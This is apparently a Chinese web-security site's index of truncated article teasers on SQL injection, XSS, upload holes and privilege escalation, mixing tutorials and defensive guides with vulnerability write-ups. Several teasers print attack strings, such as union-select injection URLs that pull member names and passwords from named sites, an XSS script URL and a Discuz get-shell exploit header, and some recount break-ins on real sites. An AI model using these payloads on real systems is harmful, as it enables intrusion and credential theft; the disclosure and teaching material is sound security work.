如何修改用户控制权限管理自启动文件 - Windows操关注热度:30

现在不少软件，如WinDIY、MyIM等，每次运行后都会自动在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun下添加该软件的字符串值，目的是为了在系统启动时运行该软件。 但很多时候这种功..[详情]

Bypass XSS filters (Paper) - 网站安全 - 自学php关注热度:83

Bypass XSS filters (Paper)##############################################Title : XSS, how to bypass filters ##Author : k3nz0&..[详情]

2.2.2.2 注入点的判断 - 网站安全 - 自学php关注热度:26

我们已经知道为什么出现注入了，那么如何判断一个提交变量的数据库查询存在注入漏洞呢？我们看到select*fromadminwhereid=1像这样的查询语句如果我们在后面加个“”就会导致程序程序因..[详情]

2.2.2.1 注入的产生 - 网站安全 - 自学php关注热度:23

在上一节我们说完了带有注入漏洞的程序的编写，但是大家能发现那里出现漏洞了么？其实漏洞就出现在数据库查询语句中，由于数据库查询的规范为拼接查询。在编写上面的asp程序大..[详情]

2.2 基础的SQL注入与原理的讲述 - 网站安全 - 自学关注热度:36

SQL注入是用户提交数据所产生的，那么如何去产生呢？黑客提交了什么数据呢？黑客提交数据会返回什么呢？这就是我们下面要阐述的。2.2.1带有注入漏洞程序的编写由于SQL可以针对不同..[详情]

2.2.1.2 数据库连接文件的创建 - 网站安全 - 自学关注热度:16

2.2.1.2数据库连接文件的创建创建完数据库就进行我们的第二步操作“连接数据库”，说起连接数据库那就不得不说一下ADO。ADO是ActiveXDataObject(ActiveX数据对象)的英文缩写，他是微软公司..[详情]

2.1注入技术概述 - 网站安全 - 自学php关注热度:20

SQL注入攻击（SQLinjection），就是通过把SQL命令插入到Web表单输入域页面请求的查询字符串，欺骗服务器执行恶意的SQL命令，根据程序的返回接过获取黑客需要的数据。如图：攻击者构造..[详情]

Web 应用程序安全设计指南 - 网站安全 - 自学php关注热度:21

本模块内容Web 应用程序为结构设计人员、设计人员和开发人员提出了一系列复杂的安全问题。最安全、最有能力抵御攻击的 Web 应用程序是那些应用安全思想构建的应用程序。在设计初..[详情]

新浪VIP读书频道XSS及修复 - 网站安全 - 自学php关注热度:28

新浪VIP读书频道XSSalert(5427518);http://vip.book.sina.com.cn/pub/cate.php?cd="scriptalert(5427518);/script"c=002009dpc=1首发：少帅修复：新浪肯定会了。。。。过滤就完了呗..[详情]

JBI CMS SQL注射漏洞及修复 - 网站安全 - 自学php关注热度:16

JBI CMS 程序过滤不严导致SQL注入攻击。Exploit :http://www.chinasg.tk/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_membersLogin page for members : /member.phpLogin page..[详情]

记一次漫长的台湾渗透过程 - 网站安全 - 自学p关注热度:27

6月26日，流年给了我几个台湾的网站让我一起渗透，是专门做游戏外挂的，当时看了下网站，第一感觉就是非常的棘手，记得网站系统貌似是动易的，也有帝国CMS5.1的，试过所有的利用..[详情]

对某航空媒体运营商网站的友情检测(序文提权关注热度:25

今天下午正在搞国外网站的时候群里小寒Q我，问我对PHP的注入有没有兴趣，本人对PHP的注射经验不是很多，难得就机会练手，便答应了小寒，注入点给了我，并且还告诉我是root权限的，..[详情]

E-Php 内容管理系统SQL注射及修复 - 网站安全 - 自关注热度:10

漏洞类型：SQL注入漏洞描述：E-Php Content Management System （CMS），article.php页面存在SQL注射。漏洞测试：http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12http://target/pat..[详情]

URL地址传参问题（防止黑客攻击） - 网站安全关注热度:19

在java里，有一个PreparedStatment的东西，不知道.net里有没有，这个东西比较身心，如果.net里有类似的东西，可以用。另外，还有种方法，输入参数里过滤 and select这些sql关键字，但是这个..[详情]

关于Java网站建设之网站安全性 - 网站安全 - 自学关注热度:16

关于Java网站建设，我们要首先了解Java语言，了解Java语言的安全性，更多的关注Java网站的安全性，那么我们简单介绍一下Java语言，Java语言的安全性，用Java语言制作的网站的安全性。..[详情]

BlogBus跨站攻击实例剖析 - 网站安全 - 自学php关注热度:20

作者：泉哥主页：http://riusksk.blogbus.com前言跨站攻击，即Cross Site Script Execution(通常简写为XSS，因为CSS与层叠样式表同名，故改为XSS) 是指攻击者利用网站程序对用户输入过滤不足，输入可..[详情]

浅谈电子商务中的安全防范技术 - 网站安全 - 自关注热度:16

一、前言 电子商务出现于20世纪90年代，发展的时间并不长，但与传统商务相比，电子商务具有惊人的发展速度。而电子商务安全问题成为电子商务发展过程中最大的障碍。因此实现电子..[详情]

WordPress cformsII插件rs和rsargs参数脚本注入漏洞及修关注热度:47

影响版本:Nicole Stich cformsII 11.5漏洞描述:WordPress是一款免费的论坛Blog系统。WordPress所使用的cformsII插件没有正确的过滤用户提交给wp-content/plugins/cforms /lib_ajax.php页面的rs和rsargs参数便显示..[详情]

MetInfo 3.0 (fckeditor)上传漏洞 - 网站安全 - 自学ph关注热度:50

MetInfo企业网站管理系统是采用PHP+MYSQL构架的，其中采用了FCKeditor在线编辑器配置不当导致上传被利用，在某些情况下上传1.php.pdf可获取网站shell。Exploit: ?php /*..[详情]

Zoopeer 0.1 & 0.2 fckeditor php4上传漏洞及修复 - 网关注热度:32

Zoopeer 0.1 0.2 程序使用了fckeditor php版本编辑器，未对上传合理配置验证。导致可以提交*.php4文件控制网站权限。EXP上传地址：http://www.chinasg.tk/fck/editor/filemanager/browser/default/browser.html?Typ..[详情]

xp_hello.dll(sa) 提权 - 网站安全 - 自学php关注热度:26

来源：冰点论坛 2月主要代码：在VC6里面新建一个储存过程项目，在proc.cpp中写入如下代码：#include stdafx.h#include shellapi.h#define XP_NOERROR 0#define XP_ERROR 1#define MAXCOLNAME 25#define..[详情]

网易贺卡频道的一个跨站bug - 网站安全 - 自学p关注热度:23

如图..[详情]

如何避免Web 2.0安全威胁？ - 网站安全 - 自学php关注热度:26

Web 2.0技术的协作性和互动性对企业具有极大吸引力，各种规模的公司都可以充分利用社交网站，免费在线服务和其他的协作型web 2.0平台。虽然其互动性兼具趣味性和启发性，但同时它也..[详情]

对搜狐、网易和TOM三大门户网站的SQL注入漏洞检关注热度:31

摘自：大中型网络入侵要案直击与防御电子工业出版社授权红黑联盟www.2cto.com发布可得到当前数据库用户名为admin，数据库服务器地址为10.10.82.159，数据库版本为Mysql 5.0.27，当前数据库名..[详情]

Oracle注入点信息基本检测 - 网站安全 - 自学php关注热度:19

摘自：大中型网络入侵要案直击与防御电子工业出版社授权红黑联盟www.2cto.com发布Oracle注入点信息基本检测对于Oracle注入点的检测比较特殊，不像其它注入点一样，需要经过多个步骤检..[详情]

利用知名站点欺骗挂马揭秘 - 网站安全 - 自学p关注热度:43

摘自：大中型网络入侵要案直击与防御电子工业出版社授权红黑联盟www.2cto.com发布如果查看此时的Google图片预览页面链接地址，可发现形如：http://images.google.com/imgres?imgurl=http://www.2cto...[详情]

案例参考：手工Oracle注入某足彩在线网站 - 网站关注热度:26

摘自：大中型网络入侵要案直击与防御电子工业出版社授权红黑联盟www.2cto.com发布 字段数目与字段类型检测 先检测注入点处查询字段数目，提交：http://www.****china.com/jst/md_end.jsp?id=76 o..[详情]

MetInfo 2.0 PHP代码注入漏洞及修复 - 网站安全 - 自关注热度:15

影响版本:MetInfo 2.0漏洞描述:MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台，PHP+MYSQL架构MetInfo 2.0的/include/common.inc.php文件第132行：eval(base64_decode($class2_all_1[0])); $cla..[详情]

MetInfo 3.0 PHP代码注入漏洞及修复 - 网站安全 - 自关注热度:10

影响版本:MetInfo 3.0漏洞描述:MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台，PHP+MYSQL架构MetInfo 3.0的/include/common.inc.php文件第67行：eval(base64_decode($allclass[0]));$allclass[..[详情]

dz~~~~马后炮 - 网站安全 - 自学php关注热度:56

by:xhm1n9#!/usr/bin/php?phpprint_r(+-------------------------------------------------------------------------------------------+2010.2.6discuz 7.0-7.2 get shellexploit by xhmingsite: http://hi.baidu.com/mr_xhming+..[详情]